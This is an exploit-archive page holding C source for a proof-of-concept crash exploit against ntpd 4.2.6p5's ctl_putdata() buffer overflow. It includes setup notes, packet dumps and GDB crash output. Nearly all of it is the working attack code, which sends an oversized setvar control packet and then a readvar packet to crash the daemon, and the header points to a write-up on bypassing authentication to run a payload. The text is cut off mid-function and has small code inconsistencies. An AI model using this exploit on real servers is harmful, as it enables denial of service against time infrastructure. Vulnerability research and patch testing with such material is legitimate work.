Ntpd ntp-4.2.6p5 ctl_putdata() Buffer Overflow Exploit



EKU-ID: 5398 CVE: OSVDB-ID:
Author: Marcin Kozlowski Published: 2016-02-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
Ntpd <= ntp-4.2.6p5 ctl_putdata() Buffer Overflow
Author: Marcin Kozlowski 
Based on: ntpq client from ntp package
  
Provided for legal security research and testing purposes ONLY
  
PoC
  
DoS (Denial of Service) PoC. Will crash NTPd.
  
You will need to know the KEY ID and MD5 password, for example put this in you ntp.conf
  
--------------
/etc/ntp.conf
--------------
  
keys /etc/ntp.keys
trustedkey 1
requestkey 1
controlkey 1
  
  
and in /etc/ntp.keys
  
-------------
/etc/ntp.keys
-------------
  
1 M 1111111
  
  
  
  
1 is KEY ID 
1111111 is MD5 password
  
Hostname and Port is hardcoded in the code. Change it if you want :)
  
gcc ntpd-exp.c -o ntpd-exp
  
./ntpd-exp
Keyid: 1
MD5 Password: 
Sending 988 octets
Packet data:
 16 08 00 00 00 00 00 00
 00 00 03 b7 73 65 74 76
 ...
 00 00 00 01 28 05 99 c2
 16 ba a7 b7 8d d3 22 00
 0c f7 6a 5f
Sending 36 octets
Packet data:
 16 02 00 00 00 00 00 00
 00 00 00 01 41 00 00 00
 00 00 00 01 7b a5 e6 6e
 e7 a7 f7 cd 65 8f 1d 5f
 51 92 d0 41
  
KABOOM Ntpd should crash!!!
  
GDB output:
  
Program received signal SIGSEGV, Segmentation fault.
read_variables (rbufp=<optimized out>, restrict_mask=<optimized out>)
    at ntp_control.c:2300
2300                            for (i = 0; ext_sys_var &&
(gdb) 
  
  
  
  
If you want to bypass knowing KEY ID and MD5 Password and execute your payload, read more:
  
http://googleprojectzero.blogspot.com/2015/01/finding-and-exploiting-ntpd.html
  
  
*/
  
#include <stdio.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/time.h>
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h> 
  
  
typedef unsigned short associd_t; /* association ID */
typedef uint32_t keyid_t;
typedef int SOCKET;
  
struct sockaddr_in serverAddr;
socklen_t addr_size;    
  
#define CTL_MAX_DATA_LEN        1300
#define MAX_MAC_LEN     (6 * sizeof(uint32_t))  /* SHA */
  
#define MODE_CONTROL    6       /* control mode */
  
#define CTL_OP_CONFIGURE        8
  
#define CTL_OP_READVAR          2
  
#define CTL_OP_MASK     0x1f
  
#define NID_md5 4
#define NTP_MAXKEY      65535
  
  
/*
 * Stuff for putting things back into li_vn_mode
 */
#define PKT_LI_VN_MODE(li, vn, md) \
        ((u_char)((((li) << 6) & 0xc0) | (((vn) << 3) & 0x38) | ((md) & 0x7)))
  
#define F1(x, y, z) (z ^ (x & (y ^ z)))
#define F2(x, y, z) F1(z, x, y)
#define F3(x, y, z) (x ^ y ^ z)
#define F4(x, y, z) (y ^ (x | ~z))
  
#define MD5STEP(f,w,x,y,z,in,s) \
         (w += f(x,y,z) + in, w = (w<<s | w>>(32-s)) + x)
  
  
struct ntp_control {
        u_char li_vn_mode;              /* leap, version, mode */
        u_char r_m_e_op;                /* response, more, error, opcode */
        u_short sequence;               /* sequence number of request */
        u_short status;                 /* status word for association */
        associd_t associd;              /* association ID */
        u_short offset;                 /* offset of this batch of data */
        u_short count;                  /* count of data in this packet */
        u_char data[(1300 + MAX_MAC_LEN)]; /* data + auth */
};
  
#define NTP_OLDVERSION  ((u_char)1)
u_char pktversion = NTP_OLDVERSION + 1;
  
#define CTL_HEADER_LEN          (offsetof(struct ntp_control, data))
  
/*
 * COUNTOF(array) - size of array in elements
 */
#define COUNTOF(arr)    (sizeof(arr) / sizeof((arr)[0]))
  
  
  
/*
 * Sequence number used for requests.  It is incremented before
 * it is used.
 */
u_short sequence;
  
/*
 * Flag which indicates we should always send authenticated requests
 */
int always_auth = 0;
  
/*
 * Keyid used for authenticated requests.  Obtained on the fly.
 */
u_long info_auth_keyid = 0;
  
static  int     info_auth_keytype = NID_md5;    /* MD5 */
static  size_t  info_auth_hashlen = 16;         /* MD5 */
  
int debug = 10;
  
SOCKET sockfd;                                  /* fd socket is opened on */
  
char currenthost[256];                  /* current host name */
  
char *progname = "exp";
  
struct savekey {
        struct savekey *next;
        union {
                u_char MD5_key[64];     /* for keys up to to 512 bits */
        } k;
        keyid_t keyid;          /* key identifier */
        int     type;           /* key type */
        u_short flags;          /* flags that wave */
        u_long lifetime;        /* remaining lifetime */
        int keylen;             /* key length */
};
  
/*
 * The key cache. We cache the last key we looked at here.
 */
keyid_t cache_keyid;            /* key identifier */
u_char  *cache_key;             /* key pointer */
u_int   cache_keylen;           /* key length */
int     cache_type;             /* key type */
u_short cache_flags;            /* flags that wave */
  
  
#define KEY_TRUSTED     0x001   /* this key is trusted */
  
#define MEMINC  12      
  
#define EVP_MAX_MD_SIZE 64
  
typedef struct {
        uint32_t buf[4];
        uint32_t bytes[2];
        uint32_t in[16];
} isc_md5_t;
  
/*
 * ntp_md5.h: deal with md5.h headers
 *
 * Use the system MD5 if available, otherwise libisc's.
 */
  
  
  
typedef isc_md5_t             MD5_CTX;
#define MD5Init(c)             isc_md5_init(c)
#define MD5Update(c, p, s)     isc_md5_update(c, p, s)
#define MD5Final(d, c)         isc_md5_final((c), (d)) /* swapped */
  
/* ssl_init.c */
#ifdef OPENSSL
extern  void    ssl_init                (void);
extern  void    ssl_check_version       (void);
extern  int     ssl_init_done;
#define INIT_SSL()                              \
        do {                                    \
                if (!ssl_init_done)             \
                        ssl_init();             \
        } while (0)
#else   /* !OPENSSL follows */
#define INIT_SSL()              do {} while (0)
#endif
  
#if defined HAVE_MD5_H && defined HAVE_MD5INIT
# include <md5.h>
#else
  typedef isc_md5_t             MD5_CTX;
# define MD5Init(c)             isc_md5_init(c)
# define MD5Update(c, p, s)     isc_md5_update(c, p, s)
# define MD5Final(d, c)         isc_md5_final((c), (d)) /* swapped */
#endif
  
  
  
  
  
/*
 * Provide OpenSSL-alike MD5 API if we're not using OpenSSL
 */
  
typedef MD5_CTX                       EVP_MD_CTX;
#define EVP_get_digestbynid(t)         NULL
#define EVP_DigestInit(c, dt)          MD5Init(c)
#define EVP_DigestUpdate(c, p, s)      MD5Update(c, p, s)
#define EVP_DigestFinal(c, d, pdl)     \
        do {                            \
                MD5Final((d), (c));     \
                *(pdl) = 16;            \
        } while (0)
  
                           
/*
 * The hash table. This is indexed by the low order bits of the
 * keyid. We make this fairly big for potentially busy servers.
 */
#define HASHSIZE        64
#define HASHMASK        ((HASHSIZE)-1)
#define KEYHASH(keyid)  ((keyid) & HASHMASK)
  
  
#define min(a,b)        (((a) < (b)) ? (a) : (b))
  
  
struct savekey *key_hash[HASHSIZE];
  
u_long authkeynotfound;         /* keys not found */
u_long authkeylookups;          /* calls to lookup keys */
u_long authnumkeys;             /* number of active keys */
u_long authkeyexpired;          /* key lifetime expirations */
u_long authkeyuncached;         /* cache misses */
u_long authnokey;               /* calls to encrypt with no key */
u_long authencryptions;         /* calls to encrypt */
u_long authdecryptions;         /* calls to decrypt */
  
struct savekey *authfreekeys;
  
int authnumfreekeys;
u_long current_time;
  
  
/*!
 * The core of the MD5 algorithm, this alters an existing MD5 hash to
 * reflect the addition of 16 longwords of new data.  MD5Update blocks
 * the data and converts bytes into longwords for this routine.
 */
  
void
transform(uint32_t buf[4], uint32_t const in[16]) {
        register uint32_t a, b, c, d;
  
        a = buf[0];
        b = buf[1];
        c = buf[2];
        d = buf[3];
  
        MD5STEP(F1, a, b, c, d, in[0] + 0xd76aa478, 7);
        MD5STEP(F1, d, a, b, c, in[1] + 0xe8c7b756, 12);
        MD5STEP(F1, c, d, a, b, in[2] + 0x242070db, 17);
        MD5STEP(F1, b, c, d, a, in[3] + 0xc1bdceee, 22);
        MD5STEP(F1, a, b, c, d, in[4] + 0xf57c0faf, 7);
        MD5STEP(F1, d, a, b, c, in[5] + 0x4787c62a, 12);
        MD5STEP(F1, c, d, a, b, in[6] + 0xa8304613, 17);
        MD5STEP(F1, b, c, d, a, in[7] + 0xfd469501, 22);
        MD5STEP(F1, a, b, c, d, in[8] + 0x698098d8, 7);
        MD5STEP(F1, d, a, b, c, in[9] + 0x8b44f7af, 12);
        MD5STEP(F1, c, d, a, b, in[10] + 0xffff5bb1, 17);
        MD5STEP(F1, b, c, d, a, in[11] + 0x895cd7be, 22);
        MD5STEP(F1, a, b, c, d, in[12] + 0x6b901122, 7);
        MD5STEP(F1, d, a, b, c, in[13] + 0xfd987193, 12);
        MD5STEP(F1, c, d, a, b, in[14] + 0xa679438e, 17);
        MD5STEP(F1, b, c, d, a, in[15] + 0x49b40821, 22);
  
        MD5STEP(F2, a, b, c, d, in[1] + 0xf61e2562, 5);
        MD5STEP(F2, d, a, b, c, in[6] + 0xc040b340, 9);
        MD5STEP(F2, c, d, a, b, in[11] + 0x265e5a51, 14);
        MD5STEP(F2, b, c, d, a, in[0] + 0xe9b6c7aa, 20);
        MD5STEP(F2, a, b, c, d, in[5] + 0xd62f105d, 5);
        MD5STEP(F2, d, a, b, c, in[10] + 0x02441453, 9);
        MD5STEP(F2, c, d, a, b, in[15] + 0xd8a1e681, 14);
        MD5STEP(F2, b, c, d, a, in[4] + 0xe7d3fbc8, 20);
        MD5STEP(F2, a, b, c, d, in[9] + 0x21e1cde6, 5);
        MD5STEP(F2, d, a, b, c, in[14] + 0xc33707d6, 9);
        MD5STEP(F2, c, d, a, b, in[3] + 0xf4d50d87, 14);
        MD5STEP(F2, b, c, d, a, in[8] + 0x455a14ed, 20);
        MD5STEP(F2, a, b, c, d, in[13] + 0xa9e3e905, 5);
        MD5STEP(F2, d, a, b, c, in[2] + 0xfcefa3f8, 9);
        MD5STEP(F2, c, d, a, b, in[7] + 0x676f02d9, 14);
        MD5STEP(F2, b, c, d, a, in[12] + 0x8d2a4c8a, 20);
  
        MD5STEP(F3, a, b, c, d, in[5] + 0xfffa3942, 4);
        MD5STEP(F3, d, a, b, c, in[8] + 0x8771f681, 11);
        MD5STEP(F3, c, d, a, b, in[11] + 0x6d9d6122, 16);
        MD5STEP(F3, b, c, d, a, in[14] + 0xfde5380c, 23);
        MD5STEP(F3, a, b, c, d, in[1] + 0xa4beea44, 4);
        MD5STEP(F3, d, a, b, c, in[4] + 0x4bdecfa9, 11);
        MD5STEP(F3, c, d, a, b, in[7] + 0xf6bb4b60, 16);
        MD5STEP(F3, b, c, d, a, in[10] + 0xbebfbc70, 23);
        MD5STEP(F3, a, b, c, d, in[13] + 0x289b7ec6, 4);
        MD5STEP(F3, d, a, b, c, in[0] + 0xeaa127fa, 11);
        MD5STEP(F3, c, d, a, b, in[3] + 0xd4ef3085, 16);
        MD5STEP(F3, b, c, d, a, in[6] + 0x04881d05, 23);
        MD5STEP(F3, a, b, c, d, in[9] + 0xd9d4d039, 4);
        MD5STEP(F3, d, a, b, c, in[12] + 0xe6db99e5, 11);
        MD5STEP(F3, c, d, a, b, in[15] + 0x1fa27cf8, 16);
        MD5STEP(F3, b, c, d, a, in[2] + 0xc4ac5665, 23);
  
        MD5STEP(F4, a, b, c, d, in[0] + 0xf4292244, 6);
        MD5STEP(F4, d, a, b, c, in[7] + 0x432aff97, 10);
        MD5STEP(F4, c, d, a, b, in[14] + 0xab9423a7, 15);
        MD5STEP(F4, b, c, d, a, in[5] + 0xfc93a039, 21);
        MD5STEP(F4, a, b, c, d, in[12] + 0x655b59c3, 6);
        MD5STEP(F4, d, a, b, c, in[3] + 0x8f0ccc92, 10);
        MD5STEP(F4, c, d, a, b, in[10] + 0xffeff47d, 15);
        MD5STEP(F4, b, c, d, a, in[1] + 0x85845dd1, 21);
        MD5STEP(F4, a, b, c, d, in[8] + 0x6fa87e4f, 6);
        MD5STEP(F4, d, a, b, c, in[15] + 0xfe2ce6e0, 10);
        MD5STEP(F4, c, d, a, b, in[6] + 0xa3014314, 15);
        MD5STEP(F4, b, c, d, a, in[13] + 0x4e0811a1, 21);
        MD5STEP(F4, a, b, c, d, in[4] + 0xf7537e82, 6);
        MD5STEP(F4, d, a, b, c, in[11] + 0xbd3af235, 10);
        MD5STEP(F4, c, d, a, b, in[2] + 0x2ad7d2bb, 15);
        MD5STEP(F4, b, c, d, a, in[9] + 0xeb86d391, 21);
  
        buf[0] += a;
        buf[1] += b;
        buf[2] += c;
        buf[3] += d;
}
  
void
byteSwap(uint32_t *buf, unsigned words)
{
        unsigned char *p = (unsigned char *)buf;
  
        do {
                *buf++ = (uint32_t)((unsigned)p[3] << 8 | p[2]) << 16 |
                        ((unsigned)p[1] << 8 | p[0]);
                p += 4;
        } while (--words);
}
  
  
          
/*!
 * Final wrapup - pad to 64-byte boundary with the bit pattern
 * 1 0* (64-bit count of bits processed, MSB-first)
 */
void
isc_md5_final(isc_md5_t *ctx, unsigned char *digest) {
        int count = ctx->bytes[0] & 0x3f;    /* Number of bytes in ctx->in */
        unsigned char *p = (unsigned char *)ctx->in + count;
  
        /* Set the first char of padding to 0x80.  There is always room. */
        *p++ = 0x80;
  
        /* Bytes of padding needed to make 56 bytes (-8..55) */
        count = 56 - 1 - count;
  
        if (count < 0) {        /* Padding forces an extra block */
                memset(p, 0, count + 8);
                byteSwap(ctx->in, 16);
                transform(ctx->buf, ctx->in);
                p = (unsigned char *)ctx->in;
                count = 56;
        }
        memset(p, 0, count);
        byteSwap(ctx->in, 14);
  
        /* Append length in bits and transform */
        ctx->in[14] = ctx->bytes[0] << 3;
        ctx->in[15] = ctx->bytes[1] << 3 | ctx->bytes[0] >> 29;
        transform(ctx->buf, ctx->in);
  
        byteSwap(ctx->buf, 4);
        memcpy(digest, ctx->buf, 16);
        memset(ctx, 0, sizeof(isc_md5_t));      /* In case it's sensitive */
}
  
  
  
  
  
  
/*!
 * Update context to reflect the concatenation of another buffer full
 * of bytes.
 */
void
isc_md5_update(isc_md5_t *ctx, const unsigned char *buf, unsigned int len) {
        uint32_t t;
  
        /* Update byte count */
  
        t = ctx->bytes[0];
        if ((ctx->bytes[0] = t + len) < t)
                ctx->bytes[1]++;        /* Carry from low to high */
  
        t = 64 - (t & 0x3f);    /* Space available in ctx->in (at least 1) */
        if (t > len) {
                memcpy((unsigned char *)ctx->in + 64 - t, buf, len);
                return;
        }
        /* First chunk is an odd size */
        memcpy((unsigned char *)ctx->in + 64 - t, buf, t);
        byteSwap(ctx->in, 16);
        transform(ctx->buf, ctx->in);
        buf += t;
        len -= t;
  
        /* Process data in 64-byte chunks */
        while (len >= 64) {
                memcpy(ctx->in, buf, 64);
                byteSwap(ctx->in, 16);
                transform(ctx->buf, ctx->in);
                buf += 64;
                len -= 64;
        }
  
        /* Handle any remaining bytes of data. */
        memcpy(ctx->in, buf, len);
}
  
  
  
/*!
 * Start MD5 accumulation.  Set bit count to 0 and buffer to mysterious
 * initialization constants.
 */
void
isc_md5_init(isc_md5_t *ctx) {
        ctx->buf[0] = 0x67452301;
        ctx->buf[1] = 0xefcdab89;
        ctx->buf[2] = 0x98badcfe;
        ctx->buf[3] = 0x10325476;
  
        ctx->bytes[0] = 0;
        ctx->bytes[1] = 0;
}
  
  
/*
 * MD5authencrypt - generate message digest
 *
 * Returns length of MAC including key ID and digest.
 */
int
MD5authencrypt(
        int     type,           /* hash algorithm */
        u_char  *key,           /* key pointer */
        uint32_t *pkt,           /* packet pointer */
        int     length          /* packet length */
        )
{
        u_char  digest[EVP_MAX_MD_SIZE];
        u_int   len;
        EVP_MD_CTX ctx;
  
        /*
         * Compute digest of key concatenated with packet. Note: the
         * key type and digest type have been verified when the key
         * was creaded.
         */
        INIT_SSL();
        EVP_DigestInit(&ctx, EVP_get_digestbynid(type));
        EVP_DigestUpdate(&ctx, key, (u_int)cache_keylen);
        EVP_DigestUpdate(&ctx, (u_char *)pkt, (u_int)length);
        EVP_DigestFinal(&ctx, digest, &len);
        memmove((u_char *)pkt + length + 4, digest, len);
        return (len + 4);
}
  
  
  
  
/*
 * authhavekey - return one and cache the key, if known and trusted.
 */
int
authhavekey(
        keyid_t keyno
        )
{
        struct savekey *sk;
  
        authkeylookups++;
        if (keyno == 0 || keyno == cache_keyid)
                return (1);
  
        /*
         * Seach the bin for the key. If found and the key type
         * is zero, somebody marked it trusted without specifying
         * a key or key type. In this case consider the key missing.
         */
        authkeyuncached++;
        sk = key_hash[KEYHASH(keyno)];
        while (sk != NULL) {
                if (keyno == sk->keyid) {
                        if (sk->type == 0) {
                                authkeynotfound++;
                                return (0);
                        }
                        break;
                }
                sk = sk->next;
        }
  
        /*
         * If the key is not found, or if it is found but not trusted,
         * the key is not considered found.
         */
        if (sk == NULL) {
                authkeynotfound++;
                return (0);
  
        }
        if (!(sk->flags & KEY_TRUSTED)) {
                authnokey++;
                return (0);
        }
  
        /*
         * The key is found and trusted. Initialize the key cache.
         */
        cache_keyid = sk->keyid;
        cache_type = sk->type;
        cache_flags = sk->flags;
        cache_key = sk->k.MD5_key;
        cache_keylen = sk->keylen;
        return (1);
}
  
  
  
/*
 * authencrypt - generate message authenticator
 *
 * Returns length of authenticator field, zero if key not found.
 */
int
authencrypt(
        keyid_t keyno,
        uint32_t *pkt,
        int length
        )
{
  
        /*
         * A zero key identifier means the sender has not verified
         * the last message was correctly authenticated. The MAC
         * consists of a single word with value zero.
         */
        authencryptions++;
        pkt[length / 4] = htonl(keyno);
        if (keyno == 0) {
                return (4);
        }
        if (!authhavekey(keyno))
                return (0);
  
        return (MD5authencrypt(cache_type, cache_key, pkt, length));
}
  
  
/*
 * authtrust - declare a key to be trusted/untrusted
 */
void
authtrust(
        keyid_t keyno,
        u_long trust
        )
{
        struct savekey *sk;
  
        /*
         * Search bin for key; if it does not exist and is untrusted,
         * forget it.
         */
        sk = key_hash[KEYHASH(keyno)];
        while (sk != 0) {
                if (keyno == sk->keyid)
                    break;
  
                sk = sk->next;
        }
        if (sk == 0 && !trust)
                return;
  
        /*
         * There are two conditions remaining. Either it does not
         * exist and is to be trusted or it does exist and is or is
         * not to be trusted.
         */     
        if (sk != 0) {
                if (cache_keyid == keyno) {
                        cache_flags = 0;
                        cache_keyid = 0;
                }
  
                /*
                 * Key exists. If it is to be trusted, say so and
                 * update its lifetime. If not, return it to the
                 * free list.
                 */
                if (trust > 0) {
                        sk->flags |= KEY_TRUSTED;
                        if (trust > 1)
                                sk->lifetime = current_time + trust;
                        else
                                sk->lifetime = 0;
                        return;
                }
                sk->flags &= ~KEY_TRUSTED; {
                        struct savekey *skp;
  
                        skp = key_hash[KEYHASH(keyno)];
                        if (skp == sk) {
                                key_hash[KEYHASH(keyno)] = sk->next;
                        } else {
                                while (skp->next != sk)
                                    skp = skp->next;
                                skp->next = sk->next;
                        }
                        authnumkeys--;
  
                        sk->next = authfreekeys;
                        authfreekeys = sk;
                        authnumfreekeys++;
                }
                return;
        }
  
        /*
         * Here there is not key, but the key is to be trusted. There
         * seems to be a disconnect here. Here we allocate a new key,
         * but do not specify a key type, key or key length.
         */ 
        if (authnumfreekeys == 0)
            if (auth_moremem() == 0)
                return;
  
        sk = authfreekeys;
        authfreekeys = sk->next;
        authnumfreekeys--;
        sk->keyid = keyno;
        sk->type = 0;
        sk->keylen = 0;
        sk->flags = KEY_TRUSTED;
        sk->next = key_hash[KEYHASH(keyno)];
        key_hash[KEYHASH(keyno)] = sk;
        authnumkeys++;
        return;
}
  
  
  
  
/*
 * auth_moremem - get some more free key structures
 */
int
auth_moremem(void)
{
        struct savekey *sk;
        int i;
  
        sk = (struct savekey *)calloc(MEMINC, sizeof(struct savekey));
        if (sk == 0)
                return (0);
  
        for (i = MEMINC; i > 0; i--) {
                sk->next = authfreekeys;
                authfreekeys = sk++;
        }
        authnumfreekeys += MEMINC;
        return (authnumfreekeys);
}
  
  
void
MD5auth_setkey(
        keyid_t keyno,
        int     keytype,
        const u_char *key,
        const int len
        )
{
        struct savekey *sk;
          
        /*
         * See if we already have the key.  If so just stick in the
         * new value.
         */
        sk = key_hash[KEYHASH(keyno)];
        while (sk != NULL) {
                if (keyno == sk->keyid) {
                        sk->type = keytype;
                        sk->keylen = min(len, sizeof(sk->k.MD5_key));
#ifndef DISABLE_BUG1243_FIX
                        memcpy(sk->k.MD5_key, key, sk->keylen);
#else
                        strncpy((char *)sk->k.MD5_key, (const char *)key,
                            sizeof(sk->k.MD5_key));
#endif
                        if (cache_keyid == keyno) {
                                cache_flags = 0;
                                cache_keyid = 0;
                        }
                        return;
                }
                sk = sk->next;
        }
  
        /*
         * Need to allocate new structure.  Do it.
         */
        if (0 == authnumfreekeys && !auth_moremem())
                return;
  
        sk = authfreekeys;
        authfreekeys = sk->next;
        authnumfreekeys--;
  
        sk->keyid = keyno;
        sk->type = keytype;
        sk->flags = 0;
        sk->lifetime = 0;
        sk->keylen = min(len, sizeof(sk->k.MD5_key));
#ifndef DISABLE_BUG1243_FIX
        memcpy(sk->k.MD5_key, key, sk->keylen);
#else
        strncpy((char *)sk->k.MD5_key, (const char *)key,
            sizeof(sk->k.MD5_key));
#endif
        sk->next = key_hash[KEYHASH(keyno)];
        key_hash[KEYHASH(keyno)] = sk;
#ifdef DEBUG
        if (debug > 1) {
                char    hex[] = "0123456789abcdef";
                int     j;
  
                printf("auth_setkey: key %d type %d len %d ", sk->keyid,
                    sk->type, sk->keylen);
                for (j = 0; j < sk->keylen; j++)
                                printf("%c%c", hex[key[j] >> 4],
                                    hex[key[j] & 0xf]);
                printf("\n");
        }       
#endif
        authnumkeys++;
}
  
  
/*
 * Types of ascii representations for keys.  "Standard" means a 64 bit
 * hex number in NBS format, i.e. with the low order bit of each byte
 * a parity bit.  "NTP" means a 64 bit key in NTP format, with the
 * high order bit of each byte a parity bit.  "Ascii" means a 1-to-8
 * character string whose ascii representation is used as the key.
 */
int
authusekey(
        keyid_t keyno,
        int keytype,
        const u_char *str
        )
{
        const u_char *cp;
        int len;
  
        cp = str;
        len = strlen((const char *)cp);
        if (len == 0)
                return 0;
  
        MD5auth_setkey(keyno, keytype, str, (int)strlen((const char *)str));
        return 1;
}
  
  
/*
 * keytype_name         returns OpenSSL short name for digest by NID.
 *
 * Used by ntpq and ntpdc keytype()
 */
const char *
keytype_name(
        int nid
        )
{
        static const char unknown_type[] = "(unknown key type)";
        const char *name;
  
#ifdef OPENSSL
        INIT_SSL();
        name = OBJ_nid2sn(nid);
        if (NULL == name)
                name = unknown_type;
#else   /* !OPENSSL follows */
        if (NID_md5 == nid)
                name = "MD5";
        else
                name = unknown_type;
#endif
        return name;
}
  
  
/*
 * getpass_keytype() -- shared between ntpq and ntpdc, only vaguely
 *                      related to the rest of ssl_init.c.
 */
char *
getpass_keytype(
        int     keytype
        )
{
        char    pass_prompt[64 + 11 + 1]; /* 11 for " Password: " */
  
        snprintf(pass_prompt, sizeof(pass_prompt),
                 "%.64s Password: ", keytype_name(keytype));
  
        return getpass(pass_prompt);
}
  
  
int
authistrusted(
        keyid_t keyno
        )
{
        struct savekey *sk;
  
        if (keyno == cache_keyid)
            return ((cache_flags & KEY_TRUSTED) != 0);
  
        authkeyuncached++;
        sk = key_hash[KEYHASH(keyno)];
        while (sk != 0) {
                if (keyno == sk->keyid)
                    break;
                sk = sk->next;
        }
        if (sk == 0) {
                authkeynotfound++;
                return (0);
  
        } else if (!(sk->flags & KEY_TRUSTED)) {
                authkeynotfound++;
                return (0);
        }
        return (1);
}
  
  
  
u_long
getkeyid(
        const char *keyprompt
        )
{
        int c;
        FILE *fi;
        char pbuf[20];
        size_t i;
        size_t ilim;
  
#ifndef SYS_WINNT
        if ((fi = fdopen(open("/dev/tty", 2), "r")) == NULL)
#else
        if ((fi = _fdopen(open("CONIN$", _O_TEXT), "r")) == NULL)
#endif /* SYS_WINNT */
                fi = stdin;
        else
                setbuf(fi, (char *)NULL);
        fprintf(stderr, "%s", keyprompt); fflush(stderr);
        for (i = 0, ilim = COUNTOF(pbuf) - 1;
             i < ilim && (c = getc(fi)) != '\n' && c != EOF;
             )
                pbuf[i++] = (char)c;
        pbuf[i] = '\0';
        if (fi != stdin)
                fclose(fi);
  
        return (u_long) atoi(pbuf);
}
  
  
void
warning(
        const char *fmt,
        const char *st1,
        const char *st2
        )
{
        (void) fprintf(stderr, "%s: ", progname);
        (void) fprintf(stderr, fmt, st1, st2);
        (void) fprintf(stderr, ": ");
        perror("");
}
  
  
int
sendpkt(
        void *  xdata,
        size_t  xdatalen
        )
{
        if (debug >= 3)
                printf("Sending %lu octets\n", (u_long)xdatalen);
          
        sendto(sockfd,xdata,(size_t)xdatalen, 0,(struct sockaddr *)&serverAddr,addr_size);
  
  
        if (debug >= 4) {
                int first = 8;
                char *cdata = xdata;
  
                printf("Packet data:\n");
                while (xdatalen-- > 0) {
                        if (first-- == 0) {
                                printf("\n");
                                first = 7;
                        }
                        printf(" %02x", *cdata++ & 0xff);
                }
                printf("\n");
        }
        return 0;
}
  
  
void error(char *msg)
{
    perror(msg);
    exit(0);
}
  
  
int main(int argc, char *argv[])
{
  
  char *cfgcmd;
  u_short rstatus;
  int rsize;
  const char *rdata;
  char *resp;
  int res;
  int col;
  int i;
       
  int portNum, nBytes;
  char buffer[1024];
  
  
  /*Create UDP socket*/
  sockfd = socket(PF_INET, SOCK_DGRAM, 0);
  
  /*Configure settings in address struct*/
  serverAddr.sin_family = AF_INET;
  serverAddr.sin_port = htons(123);
  serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
  memset(serverAddr.sin_zero, '\0', sizeof serverAddr.sin_zero);  
  
  /*Initialize size variable to be used later on*/
  addr_size = sizeof serverAddr;
  
  
  
  
  cfgcmd = "setvar A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  
  res = sendrequest(CTL_OP_CONFIGURE, 0, 1, strlen(cfgcmd), cfgcmd,
                      &rstatus, &rsize, &rdata);
  
  sleep(5);
  cfgcmd = "A";
  
  res = sendrequest(CTL_OP_READVAR, 0, 1, strlen(cfgcmd), cfgcmd, 
                       &rstatus, &rsize, &rdata);
  
  
}
  
/*
 * sendrequest - format and send a request packet
 */
int
sendrequest(
        int opcode,
        int associd,
        int auth,
        int qsize,
        char *qdata
        )
{
        struct ntp_control qpkt;
        int     pktsize;
        u_long  key_id;
        char *  pass;
        int     maclen;
  
        /*
         * Check to make sure the data will fit in one packet
         */
        if (qsize > CTL_MAX_DATA_LEN) {
                fprintf(stderr,
                        "***Internal error!  qsize (%d) too large\n",
                        qsize);
                return 1;
        }
  
        /*
         * Fill in the packet
         */
        qpkt.li_vn_mode = PKT_LI_VN_MODE(0, pktversion, MODE_CONTROL);
        qpkt.r_m_e_op = (u_char)(opcode & CTL_OP_MASK);
        qpkt.sequence = htons(sequence);
        qpkt.status = 0;
        qpkt.associd = htons((u_short)associd);
        qpkt.offset = 0;
        qpkt.count = htons((u_short)qsize);
  
        pktsize = CTL_HEADER_LEN;
  
        /*
         * If we have data, copy and pad it out to a 32-bit boundary.
         */
        if (qsize > 0) {
                memcpy(qpkt.data, qdata, (size_t)qsize);
                pktsize += qsize;
                while (pktsize & (sizeof(uint32_t) - 1)) {
                        qpkt.data[qsize++] = 0;
                        pktsize++;
                }
        }
  
        /*
         * If it isn't authenticated we can just send it.  Otherwise
         * we're going to have to think about it a little.
         */
        if (!auth && !always_auth) {
                return sendpkt(&qpkt, pktsize);
        
  
        /*
         * Pad out packet to a multiple of 8 octets to be sure
         * receiver can handle it.
         */
        while (pktsize & 7) {
                qpkt.data[qsize++] = 0;
                pktsize++;
        }
  
        /*
         * Get the keyid and the password if we don't have one.
         */
        if (info_auth_keyid == 0) {
                key_id = getkeyid("Keyid: ");
                if (key_id == 0 || key_id > NTP_MAXKEY) {
                        fprintf(stderr, 
                                "Invalid key identifier\n");
                        return 1;
                }
                info_auth_keyid = key_id;
        }
        if (!authistrusted(info_auth_keyid)) {
                pass = getpass_keytype(info_auth_keytype);
                if ('\0' == pass[0]) {
                        fprintf(stderr, "Invalid password\n");
